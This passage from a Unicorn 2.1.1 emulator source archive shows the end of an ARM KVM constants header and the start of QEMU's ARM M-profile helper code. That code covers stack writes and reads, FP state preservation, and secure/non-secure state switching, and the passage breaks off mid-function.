QEMU_PSCI_0_2_FN64_CPU_SUSPEND QEMU_PSCI_0_2_FN64(1) #define QEMU_PSCI_0_2_FN64_CPU_OFF QEMU_PSCI_0_2_FN64(2) #define QEMU_PSCI_0_2_FN64_CPU_ON QEMU_PSCI_0_2_FN64(3) #define QEMU_PSCI_0_2_FN64_AFFINITY_INFO QEMU_PSCI_0_2_FN64(4) #define QEMU_PSCI_0_2_FN64_MIGRATE QEMU_PSCI_0_2_FN64(5) MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_SUSPEND, PSCI_0_2_FN_CPU_SUSPEND); MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_OFF, PSCI_0_2_FN_CPU_OFF); MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_ON, PSCI_0_2_FN_CPU_ON); MISMATCH_CHECK(QEMU_PSCI_0_2_FN_MIGRATE, PSCI_0_2_FN_MIGRATE); MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_CPU_SUSPEND, PSCI_0_2_FN64_CPU_SUSPEND); MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_CPU_ON, PSCI_0_2_FN64_CPU_ON); MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_MIGRATE, PSCI_0_2_FN64_MIGRATE); /* PSCI v0.2 return values used by TCG emulation of PSCI */ /* No Trusted OS migration to worry about when offlining CPUs */ #define QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED 2 /* We implement version 0.2 only */ #define QEMU_PSCI_0_2_RET_VERSION_0_2 2 MISMATCH_CHECK(QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED, PSCI_0_2_TOS_MP); MISMATCH_CHECK(QEMU_PSCI_0_2_RET_VERSION_0_2, (PSCI_VERSION_MAJOR(0) | PSCI_VERSION_MINOR(2))); /* PSCI return values (inclusive of all PSCI versions) */ #define QEMU_PSCI_RET_SUCCESS 0 #define QEMU_PSCI_RET_NOT_SUPPORTED -1 #define QEMU_PSCI_RET_INVALID_PARAMS -2 #define QEMU_PSCI_RET_DENIED -3 #define QEMU_PSCI_RET_ALREADY_ON -4 #define QEMU_PSCI_RET_ON_PENDING -5 #define QEMU_PSCI_RET_INTERNAL_FAILURE -6 #define QEMU_PSCI_RET_NOT_PRESENT -7 #define QEMU_PSCI_RET_DISABLED -8 MISMATCH_CHECK(QEMU_PSCI_RET_SUCCESS, PSCI_RET_SUCCESS); MISMATCH_CHECK(QEMU_PSCI_RET_NOT_SUPPORTED, PSCI_RET_NOT_SUPPORTED); MISMATCH_CHECK(QEMU_PSCI_RET_INVALID_PARAMS, PSCI_RET_INVALID_PARAMS); MISMATCH_CHECK(QEMU_PSCI_RET_DENIED, PSCI_RET_DENIED); MISMATCH_CHECK(QEMU_PSCI_RET_ALREADY_ON, PSCI_RET_ALREADY_ON); MISMATCH_CHECK(QEMU_PSCI_RET_ON_PENDING, PSCI_RET_ON_PENDING); MISMATCH_CHECK(QEMU_PSCI_RET_INTERNAL_FAILURE, PSCI_RET_INTERNAL_FAILURE); MISMATCH_CHECK(QEMU_PSCI_RET_NOT_PRESENT, PSCI_RET_NOT_PRESENT); MISMATCH_CHECK(QEMU_PSCI_RET_DISABLED, PSCI_RET_DISABLED); /* Note that KVM uses overlapping values for AArch32 and AArch64 * target CPU numbers. AArch32 targets: */ #define QEMU_KVM_ARM_TARGET_CORTEX_A15 0 #define QEMU_KVM_ARM_TARGET_CORTEX_A7 1 /* AArch64 targets: */ #define QEMU_KVM_ARM_TARGET_AEM_V8 0 #define QEMU_KVM_ARM_TARGET_FOUNDATION_V8 1 #define QEMU_KVM_ARM_TARGET_CORTEX_A57 2 #define QEMU_KVM_ARM_TARGET_XGENE_POTENZA 3 #define QEMU_KVM_ARM_TARGET_CORTEX_A53 4 /* There's no kernel define for this: sentinel value which * matches no KVM target value for either 64 or 32 bit */ #define QEMU_KVM_ARM_TARGET_NONE UINT_MAX #ifdef TARGET_AARCH64 MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_AEM_V8, KVM_ARM_TARGET_AEM_V8); MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_FOUNDATION_V8, KVM_ARM_TARGET_FOUNDATION_V8); MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A57, KVM_ARM_TARGET_CORTEX_A57); MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_XGENE_POTENZA, KVM_ARM_TARGET_XGENE_POTENZA); MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A53, KVM_ARM_TARGET_CORTEX_A53); #else MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A15, KVM_ARM_TARGET_CORTEX_A15); MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A7, KVM_ARM_TARGET_CORTEX_A7); #endif #define CP_REG_ARM64 0x6000000000000000ULL #define CP_REG_ARM_COPROC_MASK 0x000000000FFF0000 #define CP_REG_ARM_COPROC_SHIFT 16 #define CP_REG_ARM64_SYSREG (0x0013 << CP_REG_ARM_COPROC_SHIFT) #define CP_REG_ARM64_SYSREG_OP0_MASK 0x000000000000c000 #define CP_REG_ARM64_SYSREG_OP0_SHIFT 14 #define CP_REG_ARM64_SYSREG_OP1_MASK 0x0000000000003800 #define CP_REG_ARM64_SYSREG_OP1_SHIFT 11 #define CP_REG_ARM64_SYSREG_CRN_MASK 0x0000000000000780 #define CP_REG_ARM64_SYSREG_CRN_SHIFT 7 #define CP_REG_ARM64_SYSREG_CRM_MASK 0x0000000000000078 #define CP_REG_ARM64_SYSREG_CRM_SHIFT 3 #define CP_REG_ARM64_SYSREG_OP2_MASK 0x0000000000000007 #define CP_REG_ARM64_SYSREG_OP2_SHIFT 0 /* No kernel define but it's useful to QEMU */ #define CP_REG_ARM64_SYSREG_CP (CP_REG_ARM64_SYSREG >> CP_REG_ARM_COPROC_SHIFT) #ifdef TARGET_AARCH64 MISMATCH_CHECK(CP_REG_ARM64, KVM_REG_ARM64); MISMATCH_CHECK(CP_REG_ARM_COPROC_MASK, KVM_REG_ARM_COPROC_MASK); MISMATCH_CHECK(CP_REG_ARM_COPROC_SHIFT, KVM_REG_ARM_COPROC_SHIFT); MISMATCH_CHECK(CP_REG_ARM64_SYSREG, KVM_REG_ARM64_SYSREG); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP0_MASK, KVM_REG_ARM64_SYSREG_OP0_MASK); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP0_SHIFT, KVM_REG_ARM64_SYSREG_OP0_SHIFT); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP1_MASK, KVM_REG_ARM64_SYSREG_OP1_MASK); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP1_SHIFT, KVM_REG_ARM64_SYSREG_OP1_SHIFT); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRN_MASK, KVM_REG_ARM64_SYSREG_CRN_MASK); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRN_SHIFT, KVM_REG_ARM64_SYSREG_CRN_SHIFT); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRM_MASK, KVM_REG_ARM64_SYSREG_CRM_MASK); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRM_SHIFT, KVM_REG_ARM64_SYSREG_CRM_SHIFT); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP2_MASK, KVM_REG_ARM64_SYSREG_OP2_MASK); MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP2_SHIFT, KVM_REG_ARM64_SYSREG_OP2_SHIFT); #endif #undef MISMATCH_CHECK #endif ����������������������unicorn-2.1.1/qemu/target/arm/m_helper.c������������������������������������������������������������0000664�0000000�0000000�00000276476�14675241067�0020205�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM generic helpers. * * This code is licensed under the GNU GPL v2 or later. * * SPDX-License-Identifier: GPL-2.0-or-later */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "internals.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" #include "qemu/bitops.h" #include "qemu/crc32c.h" #include "exec/exec-all.h" #include "sysemu/cpus.h" #include "qemu/range.h" #include "qemu/guest-random.h" #include "arm_ldst.h" #include "exec/cpu_ldst.h" static void v7m_msr_xpsr(CPUARMState *env, uint32_t mask, uint32_t reg, uint32_t val) { /* Only APSR is actually writable */ if (!(reg & 4)) { uint32_t apsrmask = 0; if (mask & 8) { apsrmask |= XPSR_NZCV | XPSR_Q; } if ((mask & 4) && arm_feature(env, ARM_FEATURE_THUMB_DSP)) { apsrmask |= XPSR_GE; } xpsr_write(env, val, apsrmask); } } static uint32_t v7m_mrs_xpsr(CPUARMState *env, uint32_t reg, unsigned el) { uint32_t mask = 0; if ((reg & 1) && el) { mask |= XPSR_EXCP; /* IPSR (unpriv. reads as zero) */ } if (!(reg & 4)) { mask |= XPSR_NZCV | XPSR_Q; /* APSR */ if (arm_feature(env, ARM_FEATURE_THUMB_DSP)) { mask |= XPSR_GE; } } /* EPSR reads as zero */ return xpsr_read(env) & mask; } static uint32_t v7m_mrs_control(CPUARMState *env, uint32_t secure) { uint32_t value = env->v7m.control[secure]; if (!secure) { /* SFPA is RAZ/WI from NS; FPCA is stored in the M_REG_S bank */ value |= env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK; } return value; } /* * What kind of stack write are we doing? This affects how exceptions * generated during the stacking are treated. */ typedef enum StackingMode { STACK_NORMAL, STACK_IGNFAULTS, STACK_LAZYFP, } StackingMode; static bool v7m_stack_write(ARMCPU *cpu, uint32_t addr, uint32_t value, ARMMMUIdx mmu_idx, StackingMode mode) { CPUState *cs = CPU(cpu); CPUARMState *env = &cpu->env; MemTxAttrs attrs = { 0 }; MemTxResult txres; target_ulong page_size; hwaddr physaddr; int prot; ARMMMUFaultInfo fi = { 0 }; bool secure = mmu_idx & ARM_MMU_IDX_M_S; // int exc; // bool exc_secure; if (get_phys_addr(env, addr, MMU_DATA_STORE, mmu_idx, &physaddr, &attrs, &prot, &page_size, &fi, NULL)) { /* MPU/SAU lookup failed */ if (fi.type == ARMFault_QEMU_SFault) { if (mode == STACK_LAZYFP) { qemu_log_mask(CPU_LOG_INT, "...SecureFault with SFSR.LSPERR " "during lazy stacking\n"); env->v7m.sfsr |= R_V7M_SFSR_LSPERR_MASK; } else { qemu_log_mask(CPU_LOG_INT, "...SecureFault with SFSR.AUVIOL " "during stacking\n"); env->v7m.sfsr |= R_V7M_SFSR_AUVIOL_MASK; } env->v7m.sfsr |= R_V7M_SFSR_SFARVALID_MASK; env->v7m.sfar = addr; // exc = ARMV7M_EXCP_SECURE; // exc_secure = false; } else { if (mode == STACK_LAZYFP) { qemu_log_mask(CPU_LOG_INT, "...MemManageFault with CFSR.MLSPERR\n"); env->v7m.cfsr[secure] |= R_V7M_CFSR_MLSPERR_MASK; } else { qemu_log_mask(CPU_LOG_INT, "...MemManageFault with CFSR.MSTKERR\n"); env->v7m.cfsr[secure] |= R_V7M_CFSR_MSTKERR_MASK; } // exc = ARMV7M_EXCP_MEM; // exc_secure = secure; } goto pend_fault; } #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stl_le, UNICORN_ARCH_POSTFIX)(cs->uc, arm_addressspace(cs, attrs), physaddr, value, #else address_space_stl_le(cs->uc, arm_addressspace(cs, attrs), physaddr, value, #endif attrs, &txres); if (txres != MEMTX_OK) { /* BusFault trying to write the data */ if (mode == STACK_LAZYFP) { qemu_log_mask(CPU_LOG_INT, "...BusFault with BFSR.LSPERR\n"); env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_LSPERR_MASK; } else { qemu_log_mask(CPU_LOG_INT, "...BusFault with BFSR.STKERR\n"); env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_STKERR_MASK; } // exc = ARMV7M_EXCP_BUS; // exc_secure = false; goto pend_fault; } return true; pend_fault: /* * By pending the exception at this point we are making * the IMPDEF choice "overridden exceptions pended" (see the * MergeExcInfo() pseudocode). The other choice would be to not * pend them now and then make a choice about which to throw away * later if we have two derived exceptions. * The only case when we must not pend the exception but instead * throw it away is if we are doing the push of the callee registers * and we've already generated a derived exception (this is indicated * by the caller passing STACK_IGNFAULTS). Even in this case we will * still update the fault status registers. */ switch (mode) { case STACK_NORMAL: // armv7m_nvic_set_pending_derived(env->nvic, exc, exc_secure); break; case STACK_LAZYFP: // armv7m_nvic_set_pending_lazyfp(env->nvic, exc, exc_secure); break; case STACK_IGNFAULTS: break; } return false; } void armv7m_nvic_set_pending(void *opaque, int irq, bool secure) { } static bool v7m_stack_read(ARMCPU *cpu, uint32_t *dest, uint32_t addr, ARMMMUIdx mmu_idx) { CPUState *cs = CPU(cpu); CPUARMState *env = &cpu->env; MemTxAttrs attrs = { 0 }; MemTxResult txres; target_ulong page_size; hwaddr physaddr; int prot; ARMMMUFaultInfo fi = { 0 }; bool secure = mmu_idx & ARM_MMU_IDX_M_S; int exc; bool exc_secure; uint32_t value; if (get_phys_addr(env, addr, MMU_DATA_LOAD, mmu_idx, &physaddr, &attrs, &prot, &page_size, &fi, NULL)) { /* MPU/SAU lookup failed */ if (fi.type == ARMFault_QEMU_SFault) { qemu_log_mask(CPU_LOG_INT, "...SecureFault with SFSR.AUVIOL during unstack\n"); env->v7m.sfsr |= R_V7M_SFSR_AUVIOL_MASK | R_V7M_SFSR_SFARVALID_MASK; env->v7m.sfar = addr; exc = ARMV7M_EXCP_SECURE; exc_secure = false; } else { qemu_log_mask(CPU_LOG_INT, "...MemManageFault with CFSR.MUNSTKERR\n"); env->v7m.cfsr[secure] |= R_V7M_CFSR_MUNSTKERR_MASK; exc = ARMV7M_EXCP_MEM; exc_secure = secure; } goto pend_fault; } #ifdef UNICORN_ARCH_POSTFIX value = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->uc, arm_addressspace(cs, attrs), physaddr, #else value = address_space_ldl(cs->uc, arm_addressspace(cs, attrs), physaddr, #endif attrs, &txres); if (txres != MEMTX_OK) { /* BusFault trying to read the data */ qemu_log_mask(CPU_LOG_INT, "...BusFault with BFSR.UNSTKERR\n"); env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_UNSTKERR_MASK; exc = ARMV7M_EXCP_BUS; exc_secure = false; goto pend_fault; } *dest = value; return true; pend_fault: /* * By pending the exception at this point we are making * the IMPDEF choice "overridden exceptions pended" (see the * MergeExcInfo() pseudocode). The other choice would be to not * pend them now and then make a choice about which to throw away * later if we have two derived exceptions. */ armv7m_nvic_set_pending(env->nvic, exc, exc_secure); return false; } void HELPER(v7m_preserve_fp_state)(CPUARMState *env) { /* * Preserve FP state (because LSPACT was set and we are about * to execute an FP instruction). This corresponds to the * PreserveFPState() pseudocode. * We may throw an exception if the stacking fails. */ ARMCPU *cpu = env_archcpu(env); bool is_secure = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_S_MASK; bool negpri = !(env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_HFRDY_MASK); bool is_priv = !(env->v7m.fpccr[is_secure] & R_V7M_FPCCR_USER_MASK); bool splimviol = env->v7m.fpccr[is_secure] & R_V7M_FPCCR_SPLIMVIOL_MASK; uint32_t fpcar = env->v7m.fpcar[is_secure]; bool stacked_ok = true; bool ts = is_secure && (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK); bool take_exception; /* Check the background context had access to the FPU */ if (!v7m_cpacr_pass(env, is_secure, is_priv)) { // armv7m_nvic_set_pending_lazyfp(env->nvic, ARMV7M_EXCP_USAGE, is_secure); env->v7m.cfsr[is_secure] |= R_V7M_CFSR_NOCP_MASK; stacked_ok = false; } else if (!is_secure && !extract32(env->v7m.nsacr, 10, 1)) { // armv7m_nvic_set_pending_lazyfp(env->nvic, ARMV7M_EXCP_USAGE, M_REG_S); env->v7m.cfsr[M_REG_S] |= R_V7M_CFSR_NOCP_MASK; stacked_ok = false; } if (!splimviol && stacked_ok) { /* We only stack if the stack limit wasn't violated */ int i; ARMMMUIdx mmu_idx; mmu_idx = arm_v7m_mmu_idx_all(env, is_secure, is_priv, negpri); for (i = 0; i < (ts ? 32 : 16); i += 2) { uint64_t dn = *aa32_vfp_dreg(env, i / 2); uint32_t faddr = fpcar + 4 * i; uint32_t slo = extract64(dn, 0, 32); uint32_t shi = extract64(dn, 32, 32); if (i >= 16) { faddr += 8; /* skip the slot for the FPSCR */ } stacked_ok = stacked_ok && v7m_stack_write(cpu, faddr, slo, mmu_idx, STACK_LAZYFP) && v7m_stack_write(cpu, faddr + 4, shi, mmu_idx, STACK_LAZYFP); } stacked_ok = stacked_ok && v7m_stack_write(cpu, fpcar + 0x40, vfp_get_fpscr(env), mmu_idx, STACK_LAZYFP); } /* * We definitely pended an exception, but it's possible that it * might not be able to be taken now. If its priority permits us * to take it now, then we must not update the LSPACT or FP regs, * but instead jump out to take the exception immediately. * If it's just pending and won't be taken until the current * handler exits, then we do update LSPACT and the FP regs. */ // take_exception = !stacked_ok && // armv7m_nvic_can_take_pending_exception(env->nvic); /* consider armv7m_nvic_can_take_pending_exception() always return false. in unicorn */ take_exception = false; if (take_exception) { raise_exception_ra(env, EXCP_LAZYFP, 0, 1, GETPC()); } env->v7m.fpccr[is_secure] &= ~R_V7M_FPCCR_LSPACT_MASK; if (ts) { /* Clear s0 to s31 and the FPSCR */ int i; for (i = 0; i < 32; i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } /* * Otherwise s0 to s15 and FPSCR are UNKNOWN; we choose to leave them * unchanged. */ } /* * Write to v7M CONTROL.SPSEL bit for the specified security bank. * This may change the current stack pointer between Main and Process * stack pointers if it is done for the CONTROL register for the current * security state. */ static void write_v7m_control_spsel_for_secstate(CPUARMState *env, bool new_spsel, bool secstate) { bool old_is_psp = v7m_using_psp(env); env->v7m.control[secstate] = deposit32(env->v7m.control[secstate], R_V7M_CONTROL_SPSEL_SHIFT, R_V7M_CONTROL_SPSEL_LENGTH, new_spsel); if (secstate == env->v7m.secure) { bool new_is_psp = v7m_using_psp(env); uint32_t tmp; if (old_is_psp != new_is_psp) { tmp = env->v7m.other_sp; env->v7m.other_sp = env->regs[13]; env->regs[13] = tmp; } } } /* * Write to v7M CONTROL.SPSEL bit. This may change the current * stack pointer between Main and Process stack pointers. */ static void write_v7m_control_spsel(CPUARMState *env, bool new_spsel) { write_v7m_control_spsel_for_secstate(env, new_spsel, env->v7m.secure); } void write_v7m_exception(CPUARMState *env, uint32_t new_exc) { /* * Write a new value to v7m.exception, thus transitioning into or out * of Handler mode; this may result in a change of active stack pointer. */ bool new_is_psp, old_is_psp = v7m_using_psp(env); uint32_t tmp; env->v7m.exception = new_exc; new_is_psp = v7m_using_psp(env); if (old_is_psp != new_is_psp) { tmp = env->v7m.other_sp; env->v7m.other_sp = env->regs[13]; env->regs[13] = tmp; } } /* Switch M profile security state between NS and S */ static void switch_v7m_security_state(CPUARMState *env, bool new_secstate) { uint32_t new_ss_msp, new_ss_psp; if (env->v7m.secure == new_secstate) { return; } /* * All the banked state is accessed by looking at env->v7m.secure * except for the stack pointer; rearrange the SP appropriately. */ new_ss_msp = env->v7m.other_ss_msp; new_ss_psp = env->v7m.other_ss_psp; if (v7m_using_psp(env)) { env->v7m.other_ss_psp = env->regs[13]; env->v7m.other_ss_msp = env->v7m.other_sp; } else { env->v7m.other_ss_msp = env->regs[13]; env->v7m.other_ss_psp = env->v7m.other_sp; } env->v7m.secure = new_secstate; if (v7m_using_psp(env)) { env->regs[13] = new_ss_psp; env->v7m.other_sp = new_ss_msp; } else { env->regs[13] = new_ss_msp; env->v7m.other_sp = new_ss_psp; } } void HELPER(v7m_bxns)(CPUARMState *env, uint32_t dest) { /* * Handle v7M BXNS: * - if the return value is a magic value, do exception return (like BX) * - otherwise bit 0 of the return value is the target security state */ uint32_t min_magic; if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { /* Covers FNC_RETURN and EXC_RETURN magic */ min_magic = FNC_RETURN_MIN_MAGIC; } else { /* EXC_RETURN magic only */ min_magic = EXC_RETURN_MIN_MAGIC; } if (dest >= min_magic) { /* * This is an exception return magic value; put it where * do_v7m_exception_exit() expects and raise EXCEPTION_EXIT. * Note that if we ever add gen_ss_advance() singlestep support to * M profile this should count as an "instruction execution complete" * event (compare gen_bx_excret_final_code()). */ env->regs[15] = dest & ~1; env->thumb = dest & 1; HELPER(exception_internal)(env, EXCP_EXCEPTION_EXIT); /* notreached */ } /* translate.c should have made BXNS UNDEF unless we're secure */ assert(env->v7m.secure); if (!(dest & 1)) { env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; } switch_v7m_security_state(env, dest & 1); env->thumb = 1; env->regs[15] = dest & ~1; arm_rebuild_hflags(env); } void HELPER(v7m_blxns)(CPUARMState *env, uint32_t dest) { /* * Handle v7M BLXNS: * - bit 0 of the destination address is the target security state */ /* At this point regs[15] is the address just after the BLXNS */ uint32_t nextinst = env->regs[15] | 1; uint32_t sp = env->regs[13] - 8; uint32_t saved_psr; /* translate.c will have made BLXNS UNDEF unless we're secure */ assert(env->v7m.secure); if (dest & 1) { /* * Target is Secure, so this is just a normal BLX, * except that the low bit doesn't indicate Thumb/not. */ env->regs[14] = nextinst; env->thumb = 1; env->regs[15] = dest & ~1; return; } /* Target is non-secure: first push a stack frame */ if (!QEMU_IS_ALIGNED(sp, 8)) { qemu_log_mask(LOG_GUEST_ERROR, "BLXNS with misaligned SP is UNPREDICTABLE\n"); } if (sp < v7m_sp_limit(env)) { raise_exception(env, EXCP_STKOF, 0, 1); } saved_psr = env->v7m.exception; if (env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK) { saved_psr |= XPSR_SFPA; } /* Note that these stores can throw exceptions on MPU faults */ cpu_stl_data_ra(env, sp, nextinst, GETPC()); cpu_stl_data_ra(env, sp + 4, saved_psr, GETPC()); env->regs[13] = sp; env->regs[14] = 0xfeffffff; if (arm_v7m_is_handler_mode(env)) { /* * Write a dummy value to IPSR, to avoid leaking the current secure * exception number to non-secure code. This is guaranteed not * to cause write_v7m_exception() to actually change stacks. */ write_v7m_exception(env, 1); } env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; switch_v7m_security_state(env, 0); env->thumb = 1; env->regs[15] = dest; arm_rebuild_hflags(env); } static uint32_t *get_v7m_sp_ptr(CPUARMState *env, bool secure, bool threadmode, bool spsel) { /* * Return a pointer to the location where we currently store the * stack pointer for the requested security state and thread mode. * This pointer will become invalid if the CPU state is updated * such that the stack pointers are switched around (eg changing * the SPSEL control bit). * Compare the v8M ARM ARM pseudocode LookUpSP_with_security_mode(). * Unlike that pseudocode, we require the caller to pass us in the * SPSEL control bit value; this is because we also use this * function in handling of pushing of the callee-saves registers * part of the v8M stack frame (pseudocode PushCalleeStack()), * and in the tailchain codepath the SPSEL bit comes from the exception * return magic LR value from the previous exception. The pseudocode * opencodes the stack-selection in PushCalleeStack(), but we prefer * to make this utility function generic enough to do the job. */ bool want_psp = threadmode && spsel; if (secure == env->v7m.secure) { if (want_psp == v7m_using_psp(env)) { return &env->regs[13]; } else { return &env->v7m.other_sp; } } else { if (want_psp) { return &env->v7m.other_ss_psp; } else { return &env->v7m.other_ss_msp; } } } #if 0 static bool arm_v7m_load_vector(ARMCPU *cpu, int exc, bool targets_secure, uint32_t *pvec) { CPUState *cs = CPU(cpu); CPUARMState *env = &cpu->env; MemTxResult result; uint32_t addr = env->v7m.vecbase[targets_secure] + exc * 4; uint32_t vector_entry; MemTxAttrs attrs = { 0 }; ARMMMUIdx mmu_idx; // bool exc_secure; mmu_idx = arm_v7m_mmu_idx_for_secstate_and_priv(env, targets_secure, true); /* * We don't do a get_phys_addr() here because the rules for vector * loads are special: they always use the default memory map, and * the default memory map permits reads from all addresses. * Since there's no easy way to pass through to pmsav8_mpu_lookup() * that we want this special case which would always say "yes", * we just do the SAU lookup here followed by a direct physical load. */ attrs.secure = targets_secure; attrs.user = false; if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { V8M_SAttributes sattrs = { 0 }; v8m_security_lookup(env, addr, MMU_DATA_LOAD, mmu_idx, &sattrs); if (sattrs.ns) { attrs.secure = false; } else if (!targets_secure) { /* * NS access to S memory: the underlying exception which we escalate * to HardFault is SecureFault, which always targets Secure. */ // exc_secure = true; goto load_fail; } } #ifdef UNICORN_ARCH_POSTFIX vector_entry = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->uc, arm_addressspace(cs, attrs), addr, #else vector_entry = address_space_ldl(cs->uc, arm_addressspace(cs, attrs), addr, #endif attrs, &result); if (result != MEMTX_OK) { /* * Underlying exception is BusFault: its target security state * depends on BFHFNMINS. */ // exc_secure = !(cpu->env.v7m.aircr & R_V7M_AIRCR_BFHFNMINS_MASK); goto load_fail; } *pvec = vector_entry; return true; load_fail: /* * All vector table fetch fails are reported as HardFault, with * HFSR.VECTTBL and .FORCED set. (FORCED is set because * technically the underlying exception is a SecureFault or BusFault * that is escalated to HardFault.) This is a terminal exception, * so we will either take the HardFault immediately or else enter * lockup (the latter case is handled in armv7m_nvic_set_pending_derived()). * The HardFault is Secure if BFHFNMINS is 0 (meaning that all HFs are * secure); otherwise it targets the same security state as the * underlying exception. */ if (!(cpu->env.v7m.aircr & R_V7M_AIRCR_BFHFNMINS_MASK)) { // exc_secure = true; } env->v7m.hfsr |= R_V7M_HFSR_VECTTBL_MASK | R_V7M_HFSR_FORCED_MASK; // armv7m_nvic_set_pending_derived(env->nvic, ARMV7M_EXCP_HARD, exc_secure); return false; } #endif static uint32_t v7m_integrity_sig(CPUARMState *env, uint32_t lr) { /* * Return the integrity signature value for the callee-saves * stack frame section. @lr is the exception return payload/LR value * whose FType bit forms bit 0 of the signature if FP is present. */ uint32_t sig = 0xfefa125a; if (!cpu_isar_feature(aa32_vfp_simd, env_archcpu(env)) || (lr & R_V7M_EXCRET_FTYPE_MASK)) { sig |= 1; } return sig; } #if 0 static bool v7m_push_callee_stack(ARMCPU *cpu, uint32_t lr, bool dotailchain, bool ignore_faults) { /* * For v8M, push the callee-saves register part of the stack frame. * Compare the v8M pseudocode PushCalleeStack(). * In the tailchaining case this may not be the current stack. */ CPUARMState *env = &cpu->env; uint32_t *frame_sp_p; uint32_t frameptr; ARMMMUIdx mmu_idx; bool stacked_ok; uint32_t limit; bool want_psp; uint32_t sig; StackingMode smode = ignore_faults ? STACK_IGNFAULTS : STACK_NORMAL; if (dotailchain) { bool mode = lr & R_V7M_EXCRET_MODE_MASK; bool priv = !(env->v7m.control[M_REG_S] & R_V7M_CONTROL_NPRIV_MASK) || !mode; mmu_idx = arm_v7m_mmu_idx_for_secstate_and_priv(env, M_REG_S, priv); frame_sp_p = get_v7m_sp_ptr(env, M_REG_S, mode, lr & R_V7M_EXCRET_SPSEL_MASK); want_psp = mode && (lr & R_V7M_EXCRET_SPSEL_MASK); if (want_psp) { limit = env->v7m.psplim[M_REG_S]; } else { limit = env->v7m.msplim[M_REG_S]; } } else { mmu_idx = arm_mmu_idx(env); frame_sp_p = &env->regs[13]; limit = v7m_sp_limit(env); } frameptr = *frame_sp_p - 0x28; if (frameptr < limit) { /* * Stack limit failure: set SP to the limit value, and generate * STKOF UsageFault. Stack pushes below the limit must not be * performed. It is IMPDEF whether pushes above the limit are * performed; we choose not to. */ qemu_log_mask(CPU_LOG_INT, "...STKOF during callee-saves register stacking\n"); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_STKOF_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); *frame_sp_p = limit; return true; } /* * Write as much of the stack frame as we can. A write failure may * cause us to pend a derived exception. */ sig = v7m_integrity_sig(env, lr); stacked_ok = v7m_stack_write(cpu, frameptr, sig, mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x8, env->regs[4], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0xc, env->regs[5], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x10, env->regs[6], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x14, env->regs[7], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x18, env->regs[8], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x1c, env->regs[9], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x20, env->regs[10], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x24, env->regs[11], mmu_idx, smode); /* Update SP regardless of whether any of the stack accesses failed. */ *frame_sp_p = frameptr; return !stacked_ok; } #endif static void v7m_exception_taken(ARMCPU *cpu, uint32_t lr, bool dotailchain, bool ignore_stackfaults) { return; // FIXME #if 0 /* * Do the "take the exception" parts of exception entry, * but not the pushing of state to the stack. This is * similar to the pseudocode ExceptionTaken() function. */ CPUARMState *env = &cpu->env; uint32_t addr; bool targets_secure; int exc; bool push_failed = false; armv7m_nvic_get_pending_irq_info(env->nvic, &exc, &targets_secure); qemu_log_mask(CPU_LOG_INT, "...taking pending %s exception %d\n", targets_secure ? "secure" : "nonsecure", exc); if (dotailchain) { /* Sanitize LR FType and PREFIX bits */ if (!cpu_isar_feature(aa32_vfp_simd, cpu)) { lr |= R_V7M_EXCRET_FTYPE_MASK; } lr = deposit32(lr, 24, 8, 0xff); } if (arm_feature(env, ARM_FEATURE_V8)) { if (arm_feature(env, ARM_FEATURE_M_SECURITY) && (lr & R_V7M_EXCRET_S_MASK)) { /* * The background code (the owner of the registers in the * exception frame) is Secure. This means it may either already * have or now needs to push callee-saves registers. */ if 